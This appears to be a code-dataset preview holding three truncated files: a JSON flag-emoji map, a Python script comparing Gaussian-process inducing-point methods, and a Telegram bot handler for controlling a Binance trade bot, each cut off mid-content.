input
stringlengths 2.65k
237k
| output
stringclasses 1
value |
---|---|
"unicode": "1f1ee-1f1e9"
},
":flag_ie:": {
"category": "flags",
"name": "ireland",
"unicode": "1f1ee-1f1ea"
},
":flag_il:": {
"category": "flags",
"name": "israel",
"unicode": "1f1ee-1f1f1"
},
":flag_im:": {
"category": "flags",
"name": "isle of man",
"unicode": "1f1ee-1f1f2"
},
":flag_in:": {
"category": "flags",
"name": "india",
"unicode": "1f1ee-1f1f3"
},
":flag_io:": {
"category": "flags",
"name": "british indian ocean territory",
"unicode": "1f1ee-1f1f4"
},
":flag_iq:": {
"category": "flags",
"name": "iraq",
"unicode": "1f1ee-1f1f6"
},
":flag_ir:": {
"category": "flags",
"name": "iran",
"unicode": "1f1ee-1f1f7"
},
":flag_is:": {
"category": "flags",
"name": "iceland",
"unicode": "1f1ee-1f1f8"
},
":flag_it:": {
"category": "flags",
"name": "italy",
"unicode": "1f1ee-1f1f9"
},
":flag_je:": {
"category": "flags",
"name": "jersey",
"unicode": "1f1ef-1f1ea"
},
":flag_jm:": {
"category": "flags",
"name": "jamaica",
"unicode": "1f1ef-1f1f2"
},
":flag_jo:": {
"category": "flags",
"name": "jordan",
"unicode": "1f1ef-1f1f4"
},
":flag_jp:": {
"category": "flags",
"name": "japan",
"unicode": "1f1ef-1f1f5"
},
":flag_ke:": {
"category": "flags",
"name": "kenya",
"unicode": "1f1f0-1f1ea"
},
":flag_kg:": {
"category": "flags",
"name": "kyrgyzstan",
"unicode": "1f1f0-1f1ec"
},
":flag_kh:": {
"category": "flags",
"name": "cambodia",
"unicode": "1f1f0-1f1ed"
},
":flag_ki:": {
"category": "flags",
"name": "kiribati",
"unicode": "1f1f0-1f1ee"
},
":flag_km:": {
"category": "flags",
"name": "the comoros",
"unicode": "1f1f0-1f1f2"
},
":flag_kn:": {
"category": "flags",
"name": "saint kitts and nevis",
"unicode": "1f1f0-1f1f3"
},
":flag_kp:": {
"category": "flags",
"name": "north korea",
"unicode": "1f1f0-1f1f5"
},
":flag_kr:": {
"category": "flags",
"name": "korea",
"unicode": "1f1f0-1f1f7"
},
":flag_kw:": {
"category": "flags",
"name": "kuwait",
"unicode": "1f1f0-1f1fc"
},
":flag_ky:": {
"category": "flags",
"name": "cayman islands",
"unicode": "1f1f0-1f1fe"
},
":flag_kz:": {
"category": "flags",
"name": "kazakhstan",
"unicode": "1f1f0-1f1ff"
},
":flag_la:": {
"category": "flags",
"name": "laos",
"unicode": "1f1f1-1f1e6"
},
":flag_lb:": {
"category": "flags",
"name": "lebanon",
"unicode": "1f1f1-1f1e7"
},
":flag_lc:": {
"category": "flags",
"name": "<NAME>",
"unicode": "1f1f1-1f1e8"
},
":flag_li:": {
"category": "flags",
"name": "liechtenstein",
"unicode": "1f1f1-1f1ee"
},
":flag_lk:": {
"category": "flags",
"name": "<NAME>",
"unicode": "1f1f1-1f1f0"
},
":flag_lr:": {
"category": "flags",
"name": "liberia",
"unicode": "1f1f1-1f1f7"
},
":flag_ls:": {
"category": "flags",
"name": "lesotho",
"unicode": "1f1f1-1f1f8"
},
":flag_lt:": {
"category": "flags",
"name": "lithuania",
"unicode": "1f1f1-1f1f9"
},
":flag_lu:": {
"category": "flags",
"name": "luxembourg",
"unicode": "1f1f1-1f1fa"
},
":flag_lv:": {
"category": "flags",
"name": "latvia",
"unicode": "1f1f1-1f1fb"
},
":flag_ly:": {
"category": "flags",
"name": "libya",
"unicode": "1f1f1-1f1fe"
},
":flag_ma:": {
"category": "flags",
"name": "morocco",
"unicode": "1f1f2-1f1e6"
},
":flag_mc:": {
"category": "flags",
"name": "monaco",
"unicode": "1f1f2-1f1e8"
},
":flag_md:": {
"category": "flags",
"name": "moldova",
"unicode": "1f1f2-1f1e9"
},
":flag_me:": {
"category": "flags",
"name": "montenegro",
"unicode": "1f1f2-1f1ea"
},
":flag_mf:": {
"category": "flags",
"name": "<NAME>",
"unicode": "1f1f2-1f1eb"
},
":flag_mg:": {
"category": "flags",
"name": "madagascar",
"unicode": "1f1f2-1f1ec"
},
":flag_mh:": {
"category": "flags",
"name": "the marshall islands",
"unicode": "1f1f2-1f1ed"
},
":flag_mk:": {
"category": "flags",
"name": "macedonia",
"unicode": "1f1f2-1f1f0"
},
":flag_ml:": {
"category": "flags",
"name": "mali",
"unicode": "1f1f2-1f1f1"
},
":flag_mm:": {
"category": "flags",
"name": "myanmar",
"unicode": "1f1f2-1f1f2"
},
":flag_mn:": {
"category": "flags",
"name": "mongolia",
"unicode": "1f1f2-1f1f3"
},
":flag_mo:": {
"category": "flags",
"name": "macau",
"unicode": "1f1f2-1f1f4"
},
":flag_mp:": {
"category": "flags",
"name": "northern mariana islands",
"unicode": "1f1f2-1f1f5"
},
":flag_mq:": {
"category": "flags",
"name": "martinique",
"unicode": "1f1f2-1f1f6"
},
":flag_mr:": {
"category": "flags",
"name": "mauritania",
"unicode": "1f1f2-1f1f7"
},
":flag_ms:": {
"category": "flags",
"name": "montserrat",
"unicode": "1f1f2-1f1f8"
},
":flag_mt:": {
"category": "flags",
"name": "malta",
"unicode": "1f1f2-1f1f9"
},
":flag_mu:": {
"category": "flags",
"name": "mauritius",
"unicode": "1f1f2-1f1fa"
},
":flag_mv:": {
"category": "flags",
"name": "maldives",
"unicode": "1f1f2-1f1fb"
},
":flag_mw:": {
"category": "flags",
"name": "malawi",
"unicode": "1f1f2-1f1fc"
},
":flag_mx:": {
"category": "flags",
"name": "mexico",
"unicode": "1f1f2-1f1fd"
},
":flag_my:": {
"category": "flags",
"name": "malaysia",
"unicode": "1f1f2-1f1fe"
},
":flag_mz:": {
"category": "flags",
"name": "mozambique",
"unicode": "1f1f2-1f1ff"
},
":flag_na:": {
"category": "flags",
"name": "namibia",
"unicode": "1f1f3-1f1e6"
},
":flag_nc:": {
"category": "flags",
"name": "new caledonia",
"unicode": "1f1f3-1f1e8"
},
":flag_ne:": {
"category": "flags",
"name": "niger",
"unicode": "1f1f3-1f1ea"
},
":flag_nf:": {
"category": "flags",
"name": "norfolk island",
"unicode": "1f1f3-1f1eb"
},
":flag_ng:": {
"category": "flags",
"name": "nigeria",
"unicode": "1f1f3-1f1ec"
},
":flag_ni:": {
"category": "flags",
"name": "nicaragua",
"unicode": "1f1f3-1f1ee"
},
":flag_nl:": {
"category": "flags",
"name": "the netherlands",
"unicode": "1f1f3-1f1f1"
},
":flag_no:": {
"category": "flags",
"name": "norway",
"unicode": "1f1f3-1f1f4"
},
":flag_np:": {
"category": "flags",
"name": "nepal",
"unicode": "1f1f3-1f1f5"
},
":flag_nr:": {
"category": "flags",
"name": "nauru",
"unicode": "1f1f3-1f1f7"
},
":flag_nu:": {
"category": "flags",
"name": "niue",
"unicode": "1f1f3-1f1fa"
},
":flag_nz:": {
"category": "flags",
"name": "new zealand",
"unicode": "1f1f3-1f1ff"
},
":flag_om:": {
"category": "flags",
"name": "oman",
"unicode": "1f1f4-1f1f2"
},
":flag_pa:": {
"category": "flags",
"name": "panama",
"unicode": "1f1f5-1f1e6"
},
":flag_pe:": {
"category": "flags",
"name": "peru",
"unicode": "1f1f5-1f1ea"
},
":flag_pf:": {
"category": "flags",
"name": "french polynesia",
"unicode": "1f1f5-1f1eb"
},
":flag_pg:": {
"category": "flags",
"name": "papua new guinea",
"unicode": "1f1f5-1f1ec"
},
":flag_ph:": {
"category": "flags",
"name": "the philippines",
"unicode": "1f1f5-1f1ed"
},
":flag_pk:": {
"category": "flags",
"name": "pakistan",
"unicode": "1f1f5-1f1f0"
},
":flag_pl:": {
"category": "flags",
"name": "poland",
"unicode": "1f1f5-1f1f1"
},
":flag_pm:": {
"category": "flags",
"name": "saint pierre and miquelon",
"unicode": "1f1f5-1f1f2"
},
":flag_pn:": {
"category": "flags",
"name": "pitcairn",
"unicode": "1f1f5-1f1f3"
},
":flag_pr:": {
"category": "flags",
"name": "puerto rico",
"unicode": "1f1f5-1f1f7"
},
":flag_ps:": {
"category": "flags",
"name": "palestinian authority",
"unicode": "1f1f5-1f1f8"
},
":flag_pt:": {
"category": "flags",
"name": "portugal",
"unicode": "1f1f5-1f1f9"
},
":flag_pw:": {
"category": "flags",
"name": "palau",
"unicode": "1f1f5-1f1fc"
},
":flag_py:": {
"category": "flags",
"name": "paraguay",
"unicode": "1f1f5-1f1fe"
},
":flag_qa:": {
"category": "flags",
"name": "qatar",
"unicode": "1f1f6-1f1e6"
},
":flag_re:": {
"category": "flags",
"name": "r\u00e9union",
"unicode": "1f1f7-1f1ea"
},
":flag_ro:": {
"category": "flags",
"name": "romania",
"unicode": "1f1f7-1f1f4"
},
":flag_rs:": {
"category": "flags",
"name": "serbia",
"unicode": "1f1f7-1f1f8"
},
":flag_ru:": {
"category": "flags",
"name": "russia",
"unicode": "1f1f7-1f1fa"
},
":flag_rw:": {
"category": "flags",
"name": "rwanda",
"unicode": "1f1f7-1f1fc"
},
":flag_sa:": {
"category": "flags",
"name": "saudi arabia",
"unicode": "1f1f8-1f1e6"
},
":flag_sb:": {
"category": "flags",
"name": "the solomon islands",
"unicode": "1f1f8-1f1e7"
},
":flag_sc:": {
"category": "flags",
"name": "the seychelles",
"unicode": "1f1f8-1f1e8"
},
":flag_sd:": {
"category": "flags",
"name": "sudan",
"unicode": "1f1f8-1f1e9"
},
":flag_se:": {
"category": "flags",
"name": "sweden",
"unicode": "1f1f8-1f1ea"
},
":flag_sg:": {
"category": "flags",
"name": "singapore",
"unicode": "1f1f8-1f1ec"
},
":flag_sh:": {
"category": "flags",
"name": "saint helena",
"unicode": "1f1f8-1f1ed"
},
":flag_si:": {
"category": "flags",
"name": "slovenia",
"unicode": "1f1f8-1f1ee"
},
":flag_sj:": {
"category": "flags",
"name": "svalbard and <NAME>",
"unicode": "1f1f8-1f1ef"
},
":flag_sk:": {
"category": "flags",
"name": "slovakia",
"unicode": "1f1f8-1f1f0"
},
":flag_sl:": {
"category": "flags",
"name": "<NAME>",
"unicode": "1f1f8-1f1f1"
},
":flag_sm:": {
"category": "flags",
"name": "<NAME>",
"unicode": "1f1f8-1f1f2"
},
":flag_sn:": {
"category": "flags",
"name": "senegal",
"unicode": "1f1f8-1f1f3"
},
":flag_so:": {
"category": "flags",
"name": "somalia",
"unicode": "1f1f8-1f1f4"
},
":flag_sr:": {
"category": "flags",
"name": "suriname",
"unicode": "1f1f8-1f1f7"
},
":flag_ss:": {
"category": "flags",
"name": "south sudan",
"unicode": "1f1f8-1f1f8"
},
":flag_st:": {
"category": "flags",
"name": "s\u00e3o tom\u00e9 and pr\u00edncipe",
"unicode": "1f1f8-1f1f9"
},
":flag_sv:": {
"category": "flags",
"name": "el salvador",
"unicode": "1f1f8-1f1fb"
},
":flag_sx:": {
"category": "flags",
"name": "<NAME>",
"unicode": "1f1f8-1f1fd"
},
":flag_sy:": {
"category": "flags",
"name": "syria",
"unicode": "1f1f8-1f1fe"
},
":flag_sz:": {
"category": "flags",
"name": "swaziland",
"unicode": "1f1f8-1f1ff"
},
":flag_ta:": {
"category": "flags",
"name": "tristan da cunha",
"unicode": "1f1f9-1f1e6"
},
":flag_tc:": {
"category": "flags",
"name": "turks and caicos islands",
"unicode": "1f1f9-1f1e8"
},
":flag_td:": {
"category": "flags",
"name": "chad",
"unicode": "1f1f9-1f1e9"
},
":flag_tf:": {
"category": "flags",
"name": "french southern territories",
"unicode": "1f1f9-1f1eb"
},
":flag_tg:": {
"category": "flags",
"name": "togo",
"unicode": "1f1f9-1f1ec"
},
":flag_th:": {
"category": "flags",
"name": "thailand",
"unicode": "1f1f9-1f1ed"
},
":flag_tj:": {
"category": "flags",
"name": "tajikistan",
"unicode": "1f1f9-1f1ef"
},
":flag_tk:": {
"category": "flags",
"name": "tokelau",
"unicode": "1f1f9-1f1f0"
},
":flag_tl:": {
"category": "flags",
"name": "timor-leste",
"unicode": "1f1f9-1f1f1"
},
":flag_tm:": {
"category": "flags",
"name": "turkmenistan",
"unicode": "1f1f9-1f1f2"
},
":flag_tn:": {
"category": "flags",
"name": "tunisia",
"unicode": "1f1f9-1f1f3"
},
":flag_to:": {
"category": "flags",
"name": "tonga",
"unicode": "1f1f9-1f1f4"
},
":flag_tr:": {
"category": "flags",
"name": "turkey",
"unicode": "1f1f9-1f1f7"
},
":flag_tt:": {
"category": "flags",
"name": "trinidad and tobago",
"unicode": "1f1f9-1f1f9"
},
":flag_tv:": {
"category": "flags",
"name": "tuvalu",
"unicode": "1f1f9-1f1fb"
},
":flag_tw:": {
"category": "flags",
"name": "the republic of china",
"unicode": "1f1f9-1f1fc"
},
":flag_tz:": {
"category": "flags",
"name": "tanzania",
"unicode": "1f1f9-1f1ff"
},
":flag_ua:": {
"category": "flags",
"name": "ukraine",
"unicode": "1f1fa-1f1e6"
},
":flag_ug:": {
"category": "flags",
"name": "uganda",
"unicode": "1f1fa-1f1ec"
},
":flag_um:": {
"category": "flags",
"name": "united states minor outlying islands",
"unicode": "1f1fa-1f1f2"
},
":flag_us:": {
"category": "flags",
"name": "united states",
"unicode": "1f1fa-1f1f8"
},
":flag_uy:": {
"category": "flags",
"name": "uruguay",
"unicode": "1f1fa-1f1fe"
},
":flag_uz:": {
"category": "flags",
"name": "uzbekistan",
"unicode": "1f1fa-1f1ff"
},
":flag_va:": {
"category": "flags",
"name": | |
<filename>examples/inducing_points/inducing_points.py
# -*- coding: utf-8 -*-
hlp = """
Comparison of the inducing point selection methods with varying noise rates
on a simple Gaussian Process signal.
"""
if __name__ == "__main__":
import matplotlib
matplotlib.use("Agg")
import sys
reload(sys)
sys.setdefaultencoding('utf8')
import sys
import csv
import datetime
import os
import itertools as it
import time
import scipy
import numpy as np
import argparse
from scipy.stats import multivariate_normal as mvn, pearsonr, entropy
from mklaren.kernel.kernel import exponential_kernel, kernel_sum
from mklaren.kernel.kinterface import Kinterface
from mklaren.mkl.mklaren import Mklaren
from mklaren.regression.ridge import RidgeLowRank
from mklaren.regression.spgp import SPGP
from mklaren.projection.rff import RFF_KMP, RFF_TYP_NS, RFF_TYP_STAT
from mklaren.regression.ridge import RidgeMKL
from arima import Arima
import matplotlib.pyplot as plt
import pickle, gzip
# Hyperparameters
n_range = (100,) # Different numbers of data points
input_dim = 1 # Input dimension; Generating grid becames untracable for input_dim > ~4 ...
rank_range = (3, 5,) # Ranks
lbd_range = (0,) # Regularization hyperparameter
gamma_range = [0.1, 0.3, 1, 3] # Exponentiated-quadratic kernel hyperparameters
pc = 0.1 # Pseudocount; prevents inf in KL-divergence.
repeats = 500 # Sampling repeats to compare distributions
# Method print ordering
meth_order = ["Mklaren", "Arima", "CSI", "ICD", "Nystrom", "RFF", "RFF-NS", "SPGP", "True"]
# Color mappings
meth2color = {"Mklaren": "green",
"CSI": "red",
"ICD": "blue",
"Nystrom": "pink",
"SPGP": "orange",
"RFF": "magenta",
"RFF-NS": "purple",
"Arima": "black",
"True": "black",
"l2krr": "green",
"align": "pink",
"uniform": "blue",
"alignf": "red",
"alignfc": "orange"}
def generate_data(n, rank,
inducing_mode="uniform", noise=1, gamma_range=(0.1,), seed=None,
input_dim=1, signal_sampling="GP", data="mesh"):
"""
Generate an artificial dataset with imput dimension.
:param n: Number od data points.
:param rank: Number of inducing points.
:param inducing_mode: Biased or uniform distribution of data points.
:param noise: Noise variance.
:param gamma_range: Number of kernels and hyperparameters.
:param seed: Random seed.
:param input_dim: Input space dimension.
:param signal_sampling: 'GP' or 'weights'. Weights is more efficient.
:param data: mesh or input_dim.
:return:
"""
if seed is not None:
np.random.seed(seed)
# Generate data for arbitray input_dim
if data == "mesh":
x = np.linspace(-10, 10, n).reshape((n, 1))
M = np.meshgrid(*(input_dim * [x]))
X = np.array(zip(*[m.ravel() for m in M]))
N = X.shape[0]
xp = np.linspace(-10, 10, 100).reshape((100, 1))
Mp = np.meshgrid(*(input_dim * [xp]))
Xp = np.array(zip(*[m.ravel() for m in Mp]))
elif data == "random":
# Ensure data is separated at proper lengthscales
ls = SPGP.gamma2lengthscale(min(gamma_range)) / np.sqrt(input_dim)
a, b = -n * ls / 2.0, n * ls / 2.0
X = a + 2 * b * np.random.rand(n, input_dim)
N = X.shape[0]
Xp = np.random.rand(100, input_dim)
else:
raise ValueError("Unknown data mode: %s" % data)
# Kernel sum
Ksum = Kinterface(data=X, kernel=kernel_sum,
kernel_args={
"kernels": [exponential_kernel] * len(gamma_range),
"kernels_args": [{"gamma": g} for g in gamma_range]})
# Sum of kernels
Klist = [Kinterface(data=X, kernel=exponential_kernel, kernel_args={"gamma": g})
for g in gamma_range]
a = np.arange(X.shape[0], dtype=int)
if inducing_mode == "uniform":
p = None
elif inducing_mode == "biased":
af = np.sum(X + abs(X.min(axis=0)), axis=1)
p = (af ** 2 / (af ** 2).sum())
else:
raise ValueError(inducing_mode)
inxs = np.random.choice(a, p=p, size=rank, replace=False)
if signal_sampling == "GP":
Kny = Ksum[:, inxs].dot(np.linalg.inv(Ksum[inxs, inxs])).dot(Ksum[inxs, :])
f = mvn.rvs(mean=np.zeros((N,)), cov=Kny)
y = mvn.rvs(mean=f, cov=noise * np.eye(N, N))
elif signal_sampling == "weights":
L = Ksum[:, inxs].dot(scipy.linalg.sqrtm(np.linalg.inv(Ksum[inxs, inxs])))
w = mvn.rvs(mean=np.zeros(rank,), cov=np.eye(rank, rank)).ravel()
f = L.dot(w)
y = f + np.random.rand(n, 1).ravel() * noise
else:
raise ValueError(signal_sampling)
return Ksum, Klist, inxs, X, Xp, y, f
def plot_signal(X, Xp, y, f, models=None, tit="", typ="plot_models", f_out = None):
"""
Plot fitted signal.
:param X: Sampling coordinates.
:param Xp: Plotting (whole signal) coordinates.
:param y: True observed values.
:param f: True signal.
:param models: Onr dictionary per model;
"yp" Predicted signal at yp.
"anchors" Anchor (inducing points coordinates), one set per lengthscale.
"color": Color.
"label": Name.
:param tit:
:param typ: plot_models or plot_gammas
:return:
"""
# Plot signal
plt.figure()
x = X.ravel()
xp = Xp.ravel()
xmin, xmax = xp.min(), xp.max()
ymin, ymax = int(min(f.min(), y.min())) - 1, int(max(f.max(), y.max())) + 1
# Plot data
plt.plot(x, y, "k.")
plt.plot(x, f, "r--")
# Compute anchor ticks
P = max([1] + map(lambda m: len(m.get("anchors", [])), models.values()))
if typ == "plot_gammas":
Gxs = [np.linspace(xmin, xmax, 5 + 10 * g) for g in np.logspace(-1, 1, P)]
elif typ == "plot_models":
Gxs = [np.linspace(xmin, xmax, 15) for g in np.logspace(-1, 1, len(models))]
else:
raise ValueError
Gys = range(ymin - len(Gxs), ymin)
# Plot freqency scales
for gi, (gx, gy) in enumerate(zip(Gxs, Gys)):
plt.plot(gx, [gy] * len(gx), "|", color="gray")
# Plot multiple signals and anchors
if models is not None:
for mi, (label, data) in enumerate(models.items()):
if label == "True": continue
yp = data.get("yp", np.zeros((len(X), )))
color = meth2color[label]
plt.plot(xp, yp, "-", color=color, label="%s" % label)
for mi, (label, data) in enumerate(sorted(models.items(), key=lambda lb: lb[0] == "True")):
anchors = data.get("anchors", [[]])
color = meth2color[label]
if typ == "plot_gammas": # Draw for different gammas
for gi in range(P):
if len(anchors) <= gi or not len(anchors[gi]): continue
plt.plot(anchors[gi], [Gys[gi]] * len(anchors[gi]), "^",
color=color, markersize=8, alpha=0.6)
elif typ == "plot_models": # Draw for different methods
gi = mi
ancs = np.array(anchors).ravel()
plt.text(xmin - 1, Gys[gi], "[%s]" % label, horizontalalignment="right",
verticalalignment="center", color=meth2color[label])
plt.plot(ancs, [Gys[gi]] * len(ancs), "^",
color=color, markersize=8, alpha=0.6)
plt.title(tit)
plt.yticks(np.linspace(ymin, ymax, 2 * (ymax - ymin) + 1).astype(int))
plt.ylim((ymin - len(Gys) - 1, ymax))
plt.xlabel("Input space (x)")
plt.ylabel("Output space (y)")
plt.gca().yaxis.set_label_coords(-0.05, 0.75)
if f_out is None:
plt.show()
else:
plt.savefig(f_out)
plt.close()
print("Written %s" % f_out)
def plot_signal_subplots(X, Xp, y, f, models=None, f_out=None):
"""
Plot fitted signal on multiple plots to avoid clutter.
Models dictionary does not assume the 'True' model
:param X: Sampling coordinates.
:param Xp: Plotting (whole signal) coordinates.
:param y: True observed values.
:param f: True signal.
:param models: Onr dictionary per model;
"yp" Predicted signal at yp.
"anchors" Anchor (inducing points coordinates), one set per lengthscale.
"color": Color.
"label": Name.
:param f_out: Output file. If not provided, show plot on screen.
:return:
"""
x = X.ravel()
xp = Xp.ravel()
xmin, xmax = min(0, xp.min()), xp.max()
ymin, ymax = y.min(), y.max()
nmods = len(models)
fig, ax = plt.subplots(sharex=True, ncols=1, nrows=nmods, figsize=(4.33, nmods * 0.8))
for mi, (label, data) in enumerate(sorted(models.items(), key=lambda t: meth_order.index(t[0]))):
lbl = label.replace("Nystrom", "Nyström")
yp = data.get("yp", np.zeros((len(X),)))
color = meth2color[label]
# Plot to axis
ax[mi].set_xlim(xmin, xmax)
ax[mi].set_ylim(ymin, ymax)
ax[mi].plot(x, y, ".", color="gray")
if f is not None: ax[mi].plot(x, f, "r--")
ax[mi].plot(xp, yp, "-", color=color, label="%s" % label, linewidth=1.5)
# Plot anchors if provided
anchors = data.get("anchors", [[]])
ancs = np.array(anchors).ravel()
ax[mi].plot(ancs, [ymin + (ymax - ymin) * 0.05] * len(ancs),
"^", color=color, markersize=8, alpha=0.6)
ax[mi].set_ylabel(lbl)
ax[-1].set_xlabel("Input space (x)")
fig.tight_layout()
if f_out is None:
plt.show()
else:
plt.savefig(f_out)
plt.close()
print("Written %s" % f_out)
f_out_gz = f_out + ".pkl.gz"
obj = (X, Xp, y, f, models)
pickle.dump(obj, gzip.open(f_out_gz, "w"), protocol=pickle.HIGHEST_PROTOCOL)
print("Written %s" % f_out_gz)
def test(Ksum, Klist, inxs, X, Xp, y, f, delta=10, lbd=0.1, kappa=0.99,
methods=("Mklaren", "ICD", "CSI", "Nystrom", "SPGP")):
"""
Sample data from a Gaussian process and compare fits with the sum of kernels
versus list of kernels.
:param Ksum:
:param Klist:
:param inxs:
:param X:
:param Xp:
:param y:
:param f:
:param delta:
:param lbd:
:param methods:
:return:
"""
def flatten(l):
return [item for sublist in l for item in sublist]
P = len(Klist) # Number of kernels
rank = len(inxs) # Total number of inducing points over all lengthscales
anchors = X[inxs,]
# True results
results = {"True": {"anchors": anchors,
"color": "black"}}
# Fit MKL for kernel sum and
if "Mklaren" in methods:
mkl = Mklaren(rank=rank,
delta=delta, lbd=lbd)
t1 = time.time()
mkl.fit(Klist, y)
t2 = time.time() - t1
y_Klist = mkl.predict([X] * len(Klist))
yp_Klist = mkl.predict([Xp] * len(Klist))
active_Klist = [flatten([mkl.data.get(gi, {}).get("act", []) for gi in range(P)])]
anchors_Klist = [X[ix] for ix in active_Klist]
try:
rho_Klist, _ = pearsonr(y_Klist, f)
except Exception as e:
rho_Klist = 0
evar = (np.var(y) - np.var(y - y_Klist)) / np.var(y)
results["Mklaren"] = {
"rho": rho_Klist,
"active": active_Klist,
"anchors": anchors_Klist,
"sol_path": mkl.sol_path,
"yp": yp_Klist,
"time": t2,
"evar": evar,
"model": mkl,
"color": meth2color["Mklaren"]}
# Fit CSI
if "CSI" in methods:
csi = RidgeLowRank(rank=rank, lbd=lbd,
method="csi", method_init_args={"delta": delta, "kappa": kappa},)
t1 = time.time()
csi.fit([Ksum], y)
t2 = time.time() - t1
y_csi = csi.predict([X])
yp_csi = csi.predict([Xp])
active_csi = csi.active_set_
anchors_csi = [X[ix] for | |
<filename>btb_manager_telegram/handlers.py<gh_stars>0
import json
import os
import shutil
import sqlite3
import subprocess
import sys
from configparser import ConfigParser
from telegram import Bot, ReplyKeyboardMarkup, ReplyKeyboardRemove, Update
from telegram.ext import (
CallbackContext,
CommandHandler,
ConversationHandler,
Filters,
MessageHandler,
)
from telegram.utils.helpers import escape_markdown
import i18n
from btb_manager_telegram import (
BOUGHT,
BUYING,
CUSTOM_SCRIPT,
DELETE_DB,
EDIT_COIN_LIST,
EDIT_USER_CONFIG,
MENU,
PANIC_BUTTON,
SELLING,
SOLD,
UPDATE_BTB,
UPDATE_TG,
buttons,
logger,
settings,
)
from btb_manager_telegram.binance_api_utils import send_signed_request
from btb_manager_telegram.utils import (
escape_tg,
find_and_kill_binance_trade_bot_process,
get_custom_scripts_keyboard,
i18n_format,
kill_btb_manager_telegram_process,
reply_text_escape,
telegram_text_truncator,
)
def menu(update: Update, _: CallbackContext) -> int:
logger.info(f"Menu selector. ({update.message.text})")
# Panic button disabled until PR #74 is complete
# keyboard = [
# [i18n_format('keyboard.current_value'), i18n_format('keyboard.current_ratios')],
# [i18n_format('keyboard.progress'), i18n_format('keyboard.trade_history')],
# [i18n_format('keyboard.check_status'), i18n_format('keyboard.panic')],
# [i18n_format('keyboard.maintenance'), i18n_format('keyboard.configurations')],
# ]
keyboard = [
[i18n_format("keyboard.current_value"), i18n_format("keyboard.progress")],
[i18n_format("keyboard.current_ratios"), i18n_format("keyboard.next_coin")],
[i18n_format("keyboard.check_status"), i18n_format("keyboard.trade_history")],
[i18n_format("keyboard.maintenance"), i18n_format("keyboard.configurations")],
]
config_keyboard = [
[i18n_format("keyboard.start"), i18n_format("keyboard.stop")],
[i18n_format("keyboard.read_logs"), i18n_format("keyboard.delete_db")],
[i18n_format("keyboard.edit_cfg"), i18n_format("keyboard.edit_coin_list")],
[i18n_format("keyboard.export_db"), i18n_format("keyboard.back")],
]
maintenance_keyboard = [
[i18n_format("keyboard.update_tgb")],
[i18n_format("keyboard.update_btb")],
[i18n_format("keyboard.execute_script")],
[i18n_format("keyboard.back")],
]
reply_markup = ReplyKeyboardMarkup(keyboard, resize_keyboard=True)
reply_markup_config = ReplyKeyboardMarkup(config_keyboard, resize_keyboard=True)
reply_markup_maintenance = ReplyKeyboardMarkup(
maintenance_keyboard, resize_keyboard=True
)
# modify reply_text function to have it escaping characters
reply_text_escape_fun = reply_text_escape(update.message.reply_text)
if update.message.text == "/start":
logger.info("Started conversation.")
message = (
f"{i18n_format('conversation_started')}\n" f"{i18n_format('select_option')}"
)
settings.CHAT.send_message(
escape_tg(message), reply_markup=reply_markup, parse_mode="MarkdownV2"
)
if update.message.text in [
i18n_format("keyboard.back"),
i18n_format("keyboard.great"),
]:
reply_text_escape_fun(
i18n_format("select_option"),
reply_markup=reply_markup,
parse_mode="MarkdownV2",
)
elif update.message.text in [
i18n_format("keyboard.go_back"),
i18n_format("keyboard.ok"),
i18n_format("keyboard.configurations"),
]:
reply_text_escape_fun(
i18n_format("select_option"),
reply_markup=reply_markup_config,
parse_mode="MarkdownV2",
)
elif update.message.text in [
i18n_format("keyboard.maintenance"),
i18n_format("keyboard.cancel_update"),
i18n_format("keyboard.cancel"),
i18n_format("keyboard.ok_s"),
]:
reply_text_escape_fun(
i18n_format("select_option"),
reply_markup=reply_markup_maintenance,
parse_mode="MarkdownV2",
)
elif update.message.text == i18n_format("keyboard.current_value"):
for mes in buttons.current_value():
reply_text_escape_fun(
mes, reply_markup=reply_markup, parse_mode="MarkdownV2"
)
elif update.message.text == i18n_format("keyboard.panic"):
message, status = buttons.panic_btn()
if status in [BOUGHT, BUYING, SOLD, SELLING]:
if status == BOUGHT:
kb = [
[i18n_format("keyboard.stop_sell")],
[i18n_format("keyboard.go_back")],
]
elif status in [BUYING, SELLING]:
kb = [
[i18n_format("keyboard.stop_cancel")],
[i18n_format("keyboard.go_back")],
]
elif status == SOLD:
kb = [[i18n_format("keyboard.stop")], [i18n_format("keyboard.go_back")]]
reply_text_escape_fun(
message,
reply_markup=ReplyKeyboardMarkup(kb, resize_keyboard=True),
parse_mode="MarkdownV2",
)
return PANIC_BUTTON
else:
reply_text_escape_fun(
message, reply_markup=reply_markup_config, parse_mode="MarkdownV2"
)
elif update.message.text == i18n_format("keyboard.progress"):
for mes in buttons.check_progress():
reply_text_escape_fun(
mes, reply_markup=reply_markup, parse_mode="MarkdownV2"
)
elif update.message.text == i18n_format("keyboard.current_ratios"):
for mes in buttons.current_ratios():
reply_text_escape_fun(
mes, reply_markup=reply_markup, parse_mode="MarkdownV2"
)
elif update.message.text == i18n_format("keyboard.next_coin"):
for mes in buttons.next_coin():
reply_text_escape_fun(
mes, reply_markup=reply_markup, parse_mode="MarkdownV2"
)
elif update.message.text == i18n_format("keyboard.check_status"):
reply_text_escape_fun(
buttons.check_status(), reply_markup=reply_markup, parse_mode="MarkdownV2"
)
elif update.message.text == i18n_format("keyboard.trade_history"):
for mes in buttons.trade_history():
reply_text_escape_fun(
mes, reply_markup=reply_markup, parse_mode="MarkdownV2"
)
elif update.message.text == i18n_format("keyboard.start"):
logger.info("Start bot button pressed.")
reply_text_escape_fun(
i18n_format("btb.starting"),
reply_markup=reply_markup_config,
parse_mode="MarkdownV2",
)
status = buttons.start_bot()
message = [
i18n_format("btb.already_running"),
i18n_format("btb.started"),
i18n_format("btb.start_error"),
f"{i18n_format('btb.installation_path_error', path=settings.ROOT_PATH)}\n{i18n_format('btb.directory_hint')}",
f"{i18n_format('btb.lib_error', path=settings.PYTHON_PATH)}\n",
][status]
reply_text_escape_fun(
message,
reply_markup=reply_markup_config,
parse_mode="MarkdownV2",
)
elif update.message.text == i18n_format("keyboard.stop"):
reply_text_escape_fun(
buttons.stop_bot(),
reply_markup=reply_markup_config,
parse_mode="MarkdownV2",
)
elif update.message.text == i18n_format("keyboard.read_logs"):
reply_text_escape_fun(
buttons.read_log(),
reply_markup=reply_markup_config,
parse_mode="MarkdownV2",
)
elif update.message.text == i18n_format("keyboard.delete_db"):
message, status = buttons.delete_db()
if status:
kb = [[i18n_format("keyboard.confirm"), i18n_format("keyboard.go_back")]]
reply_text_escape_fun(
message,
reply_markup=ReplyKeyboardMarkup(kb, resize_keyboard=True),
parse_mode="MarkdownV2",
)
return DELETE_DB
else:
reply_text_escape_fun(
